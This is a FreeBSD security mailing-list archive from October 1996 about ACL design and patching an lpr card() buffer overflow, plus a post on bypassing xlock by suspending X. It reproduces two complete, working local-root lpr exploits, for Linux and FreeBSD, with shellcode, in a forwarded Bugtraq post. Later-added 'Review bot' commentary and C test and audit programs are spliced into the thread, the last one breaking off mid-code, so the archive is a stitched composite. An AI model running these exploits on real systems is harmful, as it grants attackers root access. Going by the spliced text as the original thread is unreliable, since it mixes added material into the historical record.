The overlaid semantics of rwx and sticky on directories could be eliminated by adding a 'delete' privilege to the file ACL, like VMS has. Lotsa design work to be done on this project, eh? ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.xmission.com/~softweyr softweyr@xmission.com From owner-freebsd-security Thu Oct 24 17:37:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA06924 for security-outgoing; Thu, 24 Oct 1996 17:37:57 -0700 (PDT) Received: from trapdoor.aracnet.com (trapdoor.aracnet.com [204.188.47.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA06919 for ; Thu, 24 Oct 1996 17:37:55 -0700 (PDT) Received: from eris.beattie.aracnet.com (ppp-u4.aracnet.com [204.188.47.133]) by trapdoor.aracnet.com (8.7.4/8.6.9) with SMTP id RAA22493; Thu, 24 Oct 1996 17:37:20 -0700 Date: Thu, 24 Oct 1996 17:36:47 -0700 (PDT) 
From: Brian Beattie X-Sender: beattie@eris.beattie.aracnet.com To: Softweyr LLC cc: Garrett Wollman , security@FreeBSD.ORG, Softweyr LLC Subject: Re: Any FreeBSD security topics of interest? In-Reply-To: <199610242310.RAA01706@xmission.xmission.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Thu, 24 Oct 1996, Softweyr LLC wrote: > > The AFS model does show that we can implement more semantics than just > read, write, and execute however. The overlaid semantics of rwx and > sticky on directories could be eliminated by adding a 'delete' privilege > to the file ACL, like VMS has. > > Lotsa design work to be done on this project, eh? ;^) > > Having implemented ACL's for UNIX and UNIX-like systems twice and worked with a third, I consider them to be a waste of time and resources. :-). I would put more effort into understanding the weaknesses of systems than in adopting band-aids developed for other systems. I think that the UNIX permissions as they stand are sufficient. Brian Beattie | From an MIT job ad "Applicants must also have http://www.aracnet.com/~beattie | extensive knowledge of UNIX, although they beattie@aracnet.com | should have sufficiently good programming taste Fax (503)331-8186 | to not consider this an achievement." 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMnALiVQwtztGaITFAQEg8gQAyvJs90bu+7UNPz6O0NWA5aFzOf/EzZMN Qf5z6bDjKzeP1ALuZiwIqWiniFZsDnzxwbTduMEAnpKCyIMl0jlDeF4d+stXykeX NGl8CaNcVjRfQQ5T2jSTuWQunbdPiiYlQO2FmgcBvf7JP9QwyxK3XrSkgr7Y3+FH +eesb1jyQdY= =LCYg -----END PGP SIGNATURE----- From owner-freebsd-security Thu Oct 24 21:53:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA21219 for security-outgoing; Thu, 24 Oct 1996 21:53:02 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA21198 for ; Thu, 24 Oct 1996 21:52:56 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id VAA15074 for ; Thu, 24 Oct 1996 21:30:25 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.7.5/8.7.3) id VAA09284; Thu, 24 Oct 1996 21:28:30 -0700 (PDT) 
From: "Rodney W. Grimes" Message-Id: <199610250428.VAA09284@GndRsh.aac.dev.com> Subject: Re: Any FreeBSD security topics of interest? In-Reply-To: <199610242310.RAA01706@xmission.xmission.com> from Softweyr LLC at "Oct 24, 96 05:10:35 pm" To: softweyr@xmission.com (Softweyr LLC) Date: Thu, 24 Oct 1996 21:28:30 -0700 (PDT) Cc: wollman@lcs.mit.edu, security@FreeBSD.ORG, softweyr@xmission.xmission.com X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > I have to say that I have always preferred AFS's per-directory ACL > > semantics to the more commonly implemented per-file ACLs. AFS does > > not use the group and other permission bits at all, but applies the > > user bits as a mask against certain rights given by the ACL. The > > permission bits in AFS ACLs are `rwidlka', for `read', `write', > > `insert', `delete', `lookup', `lock', and `administer' (i.e., change > > the ACL). This enables certain nice features such as authenticated > > local mail delivery (make a directory with permissions `System:AnyUser > > lik' and they can create new mail files in that directory but cannot > > read, write, or delete existing ones; the owner of the file is the > > authenticated sender). > > I had the opposite reaction the first time I read about them: why did > they do this? The AFS ACL system does not, for instance, allow you to > make a setuid-root executable that can be run by wes, sam, and DJ, > but nobody else, unless you create a group that holds only those people > and make it group executable. This leads to a lot of small special- > purpose groups that have to be maintained. > > The per-file ACLs do demand more administration, but also allow more > power and flexibility. > > The AFS model does show that we can implement more semantics that just > read, write, and execute however. 
> The overlaid semantics of rwx and > sticky on directories could be eliminated by adding a 'delete' privilege > to the file ACL, like VMS has. > > Lotsa design work to be done on this project, eh? ;^) Lotsa research should be done before _any_ design work. At a minimum I would look at 3 or 4 implementations that exist today, say for example the VMS you mentioned (has everything including the kitchen sink), Apollo (now HP) Domain/OS (but go to the real root of that design, Apollo Aegis, the first _real_ ``the network is the computer'' design), consider what AFS has implemented, and then someone like Primos or other unix ACL variant. Personally, I would do a mixed implementation of Aegis ACLS, with the addition of file access alert classes and some of the other ``special'' VMS acls, and use the VMS Logic Name Table mechanism for ``variant'' ACL's (and added whistle by me :-)). I would retain the Aegis Initial default file and default directory ACL's. -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Fri Oct 25 10:37:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA04534 for security-outgoing; Fri, 25 Oct 1996 10:37:35 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA04529 for ; Fri, 25 Oct 1996 10:37:27 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGqC6-00023u-00; Fri, 25 Oct 1996 11:37:18 -0600 To: security@freebsd.org Subject: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Date: Fri, 25 Oct 1996 11:37:18 -0600 
From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Here's a new LPR threat. I've come up with a patch that I'd like others on this list to vet. It is different than the one suggested by the author. I think it is better, but haven't thought through all the implications of it yet. Comments? Warner Index: lpr.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/usr.sbin/lpr/lpr/lpr.c,v retrieving revision 1.7 diff -u -r1.7 lpr.c --- lpr.c 1996/05/11 19:00:55 1.7 +++ lpr.c 1996/10/25 17:32:12 @@ -466,9 +466,26 @@ register int c; register char *p2; { - char buf[BUFSIZ]; + static char *buf=0; + static int buflen=0; register char *p1 = buf; register int len = 2; + + /* + * Make sure that we have enough buffer for the card line to + * splat out. guard against huge requests running us out of + * memory (exit when this happens). + */ + if (buflen < strlen( p2 ) + 2) { + buflen = strlen( p2 ) + 2; + if (buflen < BUFSIZ) + buflen = BUFSIZ; + buf = buf ? realloc( buf, buflen ) : malloc( buflen ); + if (!buf) { + printf("Can't get buffer for card line\n"); + exit(1); + } + } *p1++ = c; while ((c = *p2++) != '\0') { ------- Forwarded Message [[ headers edited for length ]] Date: Fri, 25 Oct 1996 16:35:57 +0300 Reply-To: Vadim Kolontsov 
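Review bot: `register char *p1 = buf;` is initialised before the new allocation block, so on the first call `buf` is still the static 0 and `*p1++ = c` writes through a null pointer; on any later call that grows the buffer, `buf = buf ? realloc( buf, buflen ) : malloc( buflen );` may move the block while `p1` keeps the old address. Reassign `p1 = buf;` after the `if (buflen < strlen( p2 ) + 2) { ... }` block, immediately before `*p1++ = c;`. Also, the comment promises to "guard against huge requests running us out of memory", but the only guard is allocation failure: any length malloc can satisfy is accepted and copied in full, so the card line handed on is unbounded. If truncation is not wanted, an explicit upper limit with a logged refusal is simpler than growing a static buffer, and `strlen( p2 )` then needs computing only once.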
From: Vadim Kolontsov To: Multiple recipients of list BUGTRAQ Hello, there is a bug in berkeley-derived lpr, which allows an attacker to get root access (see freebsd-security for details). Here is an exploit for Linux (tested on 2.0.20), for BSD (tested on FreeBSD 2.1) and a patch. Best regards, Vadim.
- -------------------------------------- linux_lpr_exploit.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

/* Returns the current stack pointer (left in %eax; gcc on i386). */
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   /* Linux/i386 shellcode: execve("/bin/sh"), then exit() */
   u_char execshell[] =
       "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
       "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
       "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
       "\xd7\xff\xff\xff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* NOP sled, followed by the shellcode ... */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* ... followed by the guessed return address, written twice */
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   /* the buffer is passed as the -C (class) argument, which card() copies unchecked */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
- ------------------------------------------- bsd_lpr_exploit.c ------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

/* Returns the current stack pointer (left in %eax; gcc on i386). */
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   /* FreeBSD/i386 shellcode: execve("/bin/sh") */
   char execshell[] =
       "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
       "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
       "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
       "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* NOP sled, followed by the shellcode ... */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* ... followed by the guessed return address, written twice */
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   /* the buffer is passed as the -C (class) argument, which card() copies unchecked */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
- -------------------------------------------------------------------------- Here is a little patch -- see file lpr.c, function card(): ("!!" marks added lines) - -------------------------------------------------------------------------- static void card(c, p2) register int c; register char *p2; { char buf[BUFSIZ]; register char *p1 = buf; register int len = 2; if (strlen(p2) > BUFSIZ-2) /* !! */ { /* !! */ printf("No, thanks...\n"); /* !! */ exit(1); /* !! */ } *p1++ = c; while ((c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } *p1++ = '\n'; write(tfd, buf, len); } With best regards, Vadim. - -------------------------------------------------------------------------- Vadim Kolontsov SysAdm/Programmer Tver Regional Center of New Information Technologies Networks Lab ------- End of Forwarded Message From owner-freebsd-security Fri Oct 25 11:20:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06648 for security-outgoing; Fri, 25 Oct 1996 11:20:39 -0700 (PDT) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06640 for ; Fri, 25 Oct 1996 11:20:34 -0700 (PDT) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id OAA26055; Fri, 25 Oct 1996 14:20:22 -0400 
From: Bill Paul Message-Id: <199610251820.OAA26055@skynet.ctr.columbia.edu> Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit To: freebsd-security@freebsd.org Date: Fri, 25 Oct 1996 14:20:21 -0400 (EDT) Cc: imp@village.org X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Somebody bounced a copy of this just a short while ago through one of the Columbia sysadmin mailing lists. >+ /* >+ * Make sure that we have enough buffer for the card line to >+ * splat out. guard against huge requests running us out of >+ * memory (exit when this happens). >+ */ >+ if (buflen < strlen( p2 ) + 2) { >+ buflen = strlen( p2 ) + 2; >+ if (buflen < BUFSIZ) >+ buflen = BUFSIZ; >+ buf = buf ? realloc( buf, buflen ) : malloc( buflen ); >+ if (!buf) { >+ printf("Can't get buffer for card line\n"); >+ exit(1); >+ } >+ } You were far more charitable with your fix than I was. When I patched my machine at home, I just did this: *** /cdrom/usr/src/usr.sbin/lpr/lpr/lpr.c Sun Oct 8 13:39:17 1995 --- lpr.c Fri Oct 25 13:35:21 1996 *************** *** 481,487 **** register int len = 2; *p1++ = c; ! while ((c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } --- 481,487 ---- register int len = 2; *p1++ = c; ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } Yes this will silently truncate the string, but if the printer subsystem isn't smart enough to deal with this gracefully then it's no damn good anyway. :) -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." 
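Review bot: the new condition `p1 < (char *)&buf + BUFSIZ` stops the loop only once `p1` already points at `buf[BUFSIZ]`, so for an argument of BUFSIZ-1 or more characters the loop fills `buf[1]` through `buf[BUFSIZ-1]` and the unconditional `*p1++ = '\n';` after it lands one byte past the array; `len` then reaches BUFSIZ+1 and `write(tfd, buf, len)` reads that byte back out. The bound has to leave the newline its slot: `p1 < buf + BUFSIZ - 1` (the `(char *)&buf` cast is redundant for an array; plain `buf` is the same address). Truncating a control-file card is a reasonable policy, but as written nothing records that it happened.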
============================================================================= From owner-freebsd-security Fri Oct 25 11:23:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06776 for security-outgoing; Fri, 25 Oct 1996 11:23:09 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06771 for ; Fri, 25 Oct 1996 11:23:07 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGquP-00027O-00; Fri, 25 Oct 1996 12:23:05 -0600 To: security@freebsd.org Subject: lpr hole in card() Date: Fri, 25 Oct 1996 12:23:05 -0600 
From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I've gone ahead and installed the OpenBSD fix, which is to truncate the buffer at BUFSIZ bytes (including the trailing '\n'). My patch is bogus: lpd might do something stupid as a result since it has a lot of BUFSIZ sized buffers in it. It also can change where the buffer is, and so it will overwrite free memory (assuming it doesn't dump core first time through). This one adds a check to make sure that we're writing inside the buffer. Here's the pseudo patch that I've applied to lpr.c. Comments? static void card(c, p2) register int c; register char *p2; { char buf[BUFSIZ]; register char *p1 = buf; register int len = 2; *p1++ = c; - while ((c = *p2++) != '\0') { + while ((c = *p2++) != '\0' && len <= sizeof(buf)) { *p1++ = (c == '\n') ? ' ' : c; len++; } *p1++ = '\n'; write(tfd, buf, len); } Warner From owner-freebsd-security Fri Oct 25 11:28:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA07061 for security-outgoing; Fri, 25 Oct 1996 11:28:29 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA07044 for ; Fri, 25 Oct 1996 11:28:20 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGqzJ-00027v-00; Fri, 25 Oct 1996 12:28:09 -0600 To: Bill Paul Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: freebsd-security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 14:20:21 EDT." <199610251820.OAA26055@skynet.ctr.columbia.edu> References: <199610251820.OAA26055@skynet.ctr.columbia.edu> Date: Fri, 25 Oct 1996 12:28:09 -0600 
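Review bot: `len <= sizeof(buf)` has the same off-by-one as the pointer test it replaces. `len` starts at 2 for the card letter already stored and the '\n' still to come, so when `len == sizeof(buf)` the only free byte is the newline's; the condition still admits that iteration, stores one more input byte, bumps `len` to BUFSIZ+1, and `*p1++ = '\n';` then writes `buf[BUFSIZ]`, after which `write(tfd, buf, len)` reads BUFSIZ+1 bytes. `len < sizeof(buf)` is the bound that keeps the letter, at most BUFSIZ-2 input characters and the newline inside `buf`. Two side points: `len` is a signed int compared against a size_t, and `(c = *p2++) != '\0'` runs before the length test, so the first dropped character is consumed before the loop stops; harmless here, but putting the length test first makes the truncation point explicit.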
From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199610251820.OAA26055@skynet.ctr.columbia.edu> Bill Paul writes: : ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { ... : Yes this will silently truncate the string, but if the printer subsystem : isn't smart enough to deal with this gracefully then it's no damn good : anyway. :) :-). I just installed a variation of this from OpenBSD. I think that the above patch has a fencepost error in it. What happens when you get more than BUFSIZ bytes? The first test will fail when buf is exactly full. However, one more byte is written after the loop ends, which will overflow onto the stack. Maybe it is harmless, but you never can tell. See my last mail in security for other reasons why my patch is completely bogus and for the patch I applied. lpd may not be able to handle the long lines due to its use of fixed buffers everywhere. Also, my patch dumps core the first time through the loop (that will teach me to post w/o testing :-). Warner From owner-freebsd-security Fri Oct 25 12:32:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA10297 for security-outgoing; Fri, 25 Oct 1996 12:32:17 -0700 (PDT) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA10291 for ; Fri, 25 Oct 1996 12:32:13 -0700 (PDT) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id PAA26175; Fri, 25 Oct 1996 15:31:53 -0400 
From: Bill Paul Message-Id: <199610251931.PAA26175@skynet.ctr.columbia.edu> Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit To: imp@village.org (Warner Losh) Date: Fri, 25 Oct 1996 15:31:51 -0400 (EDT) Cc: freebsd-security@freebsd.org In-Reply-To: from "Warner Losh" at Oct 25, 96 12:28:09 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Warner Losh had to walk into mine and say: > In message <199610251820.OAA26055@skynet.ctr.columbia.edu> Bill Paul writes: > : ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { > ... > : Yes this will silently truncate the string, but if the printer subsystem > : isn't smart enough to deal with this gracefully then it's no damn good > : anyway. :) > > :-). I just installed a variation of this from OpenBSD. I think that > the above patch has a fencepost error in it. What happens when you > get more than BUFSIZ bytes? The first test will fail when buf is > exactly full. However, one more byte is written after the loop ends, > which will overflow onto the stack. Maybe it is harmless, but you > never can tell. See my last mail in security for other reasons why my > patch is completely bogus and for the patch I applied. lpd may not be > able to handle the long lines due to its use of fixed buffers > everywhere. Also, my patch dumps core the first time through the loop > (that will teach me to post w/o testing :-). > > Warner Whups. Yeah, you're right. The assignment of the newline at the end didn't catch my eye for some reason. I suppose it should be: while (p1 < ((char *)&buf + BUFSIZ - 1) && (c = *p2++) != '\0') { In any event, overrunning the buffer by one byte and possibly dumping core is a little better than giving away a free root shell. 
:) FYI: this same bug is likely to be present in lpr on SunOS (well, duh), though obviously you'd need a different chunk of machine instructions to exploit it. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Fri Oct 25 16:23:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA02439 for security-outgoing; Fri, 25 Oct 1996 16:23:40 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA02433 for ; Fri, 25 Oct 1996 16:23:38 -0700 (PDT) Received: from glacier.cold.org (glacier.cold.org [206.81.134.54]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id QAA17579 for ; Fri, 25 Oct 1996 16:23:38 -0700 (PDT) Received: from localhost (brandon@localhost) by glacier.cold.org (8.7.5/8.7.3) with SMTP id RAA15480 for ; Fri, 25 Oct 1996 17:25:44 -0600 (MDT) Date: Fri, 25 Oct 1996 17:25:44 -0600 (MDT) 
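The bound checks proposed in the thread for card() (Bill Paul's `p1 < &buf + BUFSIZ`, the `p1 < &buf + BUFSIZ - 1` correction, Warner Losh's `len <= sizeof(buf)` and Vadim Kolontsov's reject-if-too-long test) differ from each other by exactly one byte, which is hard to see by reading. The following is an added example, not code from the thread or from the FreeBSD lpr sources: it reimplements card()'s copy loop with each candidate bound selectable, fills a small buffer (CARDBUF is an assumed stand-in for BUFSIZ) that sits inside a larger backing array with a canary byte just past its end, and reports which variants clobber the canary. The `truncated` flag is my addition, with no counterpart in lpr.c; it is there so a caller could syslog a dropped line, as suggested later in the thread.

```c
#include <stdio.h>
#include <string.h>

#define CARDBUF 64   /* stand-in for BUFSIZ, kept small so the sample input stays short */

/* The bounds proposed for card()'s loop, plus the unbounded original and the
 * reject-instead-of-truncate approach. */
enum bound {
    UNBOUNDED,      /* original 4.4BSD card(): no check at all        */
    PTR_BUFSIZ,     /* p1 < buf + BUFSIZ                              */
    PTR_BUFSIZ_M1,  /* p1 < buf + BUFSIZ - 1                          */
    LEN_LE_SIZEOF,  /* len <= sizeof(buf)                             */
    LEN_LT_SIZEOF,  /* len <  sizeof(buf)                             */
    REJECT          /* strlen(p2) > BUFSIZ - 2: refuse the request    */
};

/* card() as in lpr.c, except that the line is left in buf (bufsz bytes) and the
 * byte count that would go to write(2) is returned instead of writing to the
 * control file. Returns -1 when REJECT refuses the line. *truncated is set when
 * input was dropped, so a caller can log it. */
int card_variant(enum bound b, int c, const char *p2, char *buf, size_t bufsz, int *truncated)
{
    char *p1 = buf;
    int len = 2;                    /* the card letter plus the trailing '\n' */

    *truncated = 0;
    if (b == REJECT && strlen(p2) > bufsz - 2)
        return -1;                  /* 1 + strlen(p2) + 1 would not fit in bufsz bytes */

    *p1++ = c;
    for (;;) {
        int room = 1;
        switch (b) {
        case PTR_BUFSIZ:    room = p1 < buf + bufsz;       break;
        case PTR_BUFSIZ_M1: room = p1 < buf + bufsz - 1;   break;
        case LEN_LE_SIZEOF: room = len <= (int)bufsz;      break;
        case LEN_LT_SIZEOF: room = len <  (int)bufsz;      break;
        default:            break;  /* UNBOUNDED and REJECT never stop early */
        }
        if (!room) { *truncated = (*p2 != '\0'); break; }
        if ((c = *p2++) == '\0')
            break;
        *p1++ = (c == '\n') ? ' ' : c;
        len++;
    }
    *p1++ = '\n';                   /* the byte the off-by-one variants misplace */
    return len;
}

/* Run one variant with a '-C' argument of arglen 'A's against a CARDBUF-byte
 * buffer that lives inside a larger backing array with a canary right past its
 * end. Returns the length card_variant() reported; *clobbered is set when the
 * canary at buf[CARDBUF] was overwritten, i.e. the variant wrote past buf. */
int card_run(enum bound b, size_t arglen, int *clobbered)
{
    char backing[2 * CARDBUF + 16];  /* slack so UNBOUNDED cannot smash our own frame */
    char arg[2 * CARDBUF + 1];
    int truncated, len;

    if (arglen > 2 * CARDBUF)
        arglen = 2 * CARDBUF;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    memset(backing, 0, sizeof backing);
    backing[CARDBUF] = (char)0xAA;   /* canary */

    len = card_variant(b, 'C', arg, backing, CARDBUF, &truncated);
    *clobbered = backing[CARDBUF] != (char)0xAA;
    return len;
}

int overflows(enum bound b, size_t arglen)
{
    int clobbered;
    card_run(b, arglen, &clobbered);
    return clobbered;
}

int line_len(enum bound b, size_t arglen)
{
    int clobbered;
    return card_run(b, arglen, &clobbered);
}

int main(void)
{
    static const char *names[] = { "unbounded", "p1 < buf+BUFSIZ", "p1 < buf+BUFSIZ-1",
                                   "len <= sizeof(buf)", "len < sizeof(buf)", "reject" };
    int i;
    for (i = UNBOUNDED; i <= REJECT; i++)
        printf("%-20s len=%4d  wrote past end: %s\n", names[i],
               line_len((enum bound)i, 2 * CARDBUF),
               overflows((enum bound)i, 2 * CARDBUF) ? "yes" : "no");
    return 0;
}
```

Only `len < sizeof(buf)`, `p1 < buf + BUFSIZ - 1` and the reject test keep the canary intact; the two others each put the newline one byte past the array, which is the byte Warner Losh questioned, and the unbounded original walks straight through it.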
From: Brandon Gillespie To: security@freebsd.org Subject: console locking in X windows.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I don't know if this has been brought up before, but most people get a false sense of security by using 'xlock' or similar programs to lock their X display while away from their console. However, it is likely they started X with 'startx'. If it was started with 'xdm' this problem is not relevant. Otherwise, all a person has to do is type 'CTRL-ALT-F1' to get back to the text-console they ran startx from (or the appropriate Fn key), and type ^Z. The X-server is then suspended and they have full access to the user's shell. Simple fix: alias 'startx' to 'exec /usr/X11R6/bin/startx' I realize this problem is not as 'impacting' as others may be, and is not necessarily specific to FreeBSD, but it does exist nonetheless 8) I would even go so far as to suggest a default alias in /etc/profile and /etc/csh.cshrc, in release versions. -Brandon Gillespie From owner-freebsd-security Fri Oct 25 16:41:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA04830 for security-outgoing; Fri, 25 Oct 1996 16:41:06 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA04817 for ; Fri, 25 Oct 1996 16:41:03 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id RAA00219; Fri, 25 Oct 1996 17:40:30 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id RAA27998; Fri, 25 Oct 1996 17:37:21 -0600 (MDT) Date: Fri, 25 Oct 1996 17:37:20 -0600 (MDT) 
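The ^Z trick described above works only when the login shell that ran startx is still alive underneath the X server; `exec startx` replaces that shell, so there is nothing to return to. The following is an added example, not part of the original post: a small audit in C that, given `ps`-style `PID PPID COMMAND` lines, walks each X server's ancestry and reports a login shell (recognised by the leading '-' that login shells carry in ps output, such as `-csh`) that could be regained with Ctrl-Alt-Fn and ^Z. The process listing is constructed for the example, and the pids, the command names and the assumption that `ps -axo pid,ppid,command` prints this layout are mine, not the poster's.

```c
#include <stdio.h>
#include <string.h>

#define MAXPROCS 64

struct proc { int pid, ppid; char cmd[64]; };

/* Parse "PID PPID COMMAND ..." lines (a header line that does not start with a
 * number is skipped). Only the first word of the command is kept. Returns the
 * number of entries stored in out. */
int parse_ps(const char *text, struct proc *out, int max)
{
    int n = 0;
    const char *line = text;
    while (*line && n < max) {
        const char *nl = strchr(line, '\n');
        size_t linelen = nl ? (size_t)(nl - line) : strlen(line);
        char tmp[256];
        if (linelen >= sizeof tmp)
            linelen = sizeof tmp - 1;
        memcpy(tmp, line, linelen);
        tmp[linelen] = '\0';
        if (sscanf(tmp, "%d %d %63s", &out[n].pid, &out[n].ppid, out[n].cmd) == 3)
            n++;
        if (!nl)
            break;
        line = nl + 1;
    }
    return n;
}

static const struct proc *find_proc(const struct proc *t, int n, int pid)
{
    int i;
    for (i = 0; i < n; i++)
        if (t[i].pid == pid)
            return &t[i];
    return NULL;
}

static int basename_is(const char *cmd, const char *name)
{
    const char *slash = strrchr(cmd, '/');
    return strcmp(slash ? slash + 1 : cmd, name) == 0;
}

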